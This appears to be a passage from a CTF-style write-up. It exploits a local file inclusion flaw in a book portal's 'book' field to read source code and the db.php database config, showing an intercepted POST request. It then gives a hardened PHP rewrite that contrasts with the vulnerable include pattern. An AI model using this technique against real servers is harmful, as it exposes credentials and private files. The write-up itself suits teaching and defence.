
Exploiting LFI

Upon intercepting the requests with Burp Suite, we see that the website has an interesting request field named method.

Changing the method field from 0 to 1 throws an error message about a missing book field.

[Screenshot: error message - missing book field]

Exploit Code

Using Burp Suite, we can control the book field and, combined with the paths found in the ffuf results, perform LFI to leak the source code of the book portal as well as the admin portal.

Here, we can read the content of the database config - db.php.

POST /includes/bookController.php HTTP/1.1
Content-Length: 42
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=test1e9549a0bf4b172e168a9ca5cbaa6fdb; token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJkYXRhIjp7InVzZXJuYW1lIjoidGVzdCJ9fQ.wO1HzPNOz55oU02jJT2wXL7Mvi0JNSB353p6Mgk3o7Y
Connection: close


We can thus proceed to read the various source files to see if anything important is revealed.
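For contrast with the vulnerable behaviour above, here is an added example (not the book portal's own code) of how a controller like bookController.php could handle the book field safely; it assumes a hypothetical BOOK_DIR and a server-side allowlist of book identifiers.

```php
<?php
// Added example (not the book portal's own code): a minimal, hardened
// replacement for the "book" handling in a controller like bookController.php.
// Assumptions: books live under BOOK_DIR and are selected by an opaque id that
// the client sends in the "book" field; the id => file mapping is server-side.

declare(strict_types=1);

const BOOK_DIR = __DIR__ . '/books';

// Vulnerable pattern for contrast: the client-controlled value reaches include()
// unchanged, so a traversal path or a php:// wrapper leaks files such as db.php.
//   include($_POST['book']);

/**
 * Resolve a client-supplied book identifier to a file path, or return null.
 * Only a fixed allowlist of identifiers is accepted, and the resolved path is
 * re-checked against BOOK_DIR so a mistake in the allowlist cannot escape it.
 */
function resolveBook(string $bookId): ?string
{
    // Server-side allowlist: the client never supplies a path or a wrapper.
    static $catalogue = [
        'intro'    => 'intro.html',
        'chapter1' => 'chapter1.html',
    ];
    if (!isset($catalogue[$bookId])) {
        return null;
    }
    $base = realpath(BOOK_DIR);
    $path = realpath(BOOK_DIR . '/' . $catalogue[$bookId]);
    // realpath() returns false for missing files and collapses "..", so a
    // prefix check on the canonical path confines reads to BOOK_DIR.
    if ($base === false || $path === false
        || strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

header('Content-Type: application/json');
$bookId = (string) ($_POST['book'] ?? '');
$path = resolveBook($bookId);
if ($path === null) {
    http_response_code(400);
    echo json_encode(['error' => 'unknown book']);
    exit;
}
// The file is read, not included, so it is never executed as PHP.
echo json_encode(['content' => file_get_contents($path)]);
```

The allowlist alone closes the hole; the realpath prefix check is defence in depth against a future edit that lets a raw filename back into the catalogue.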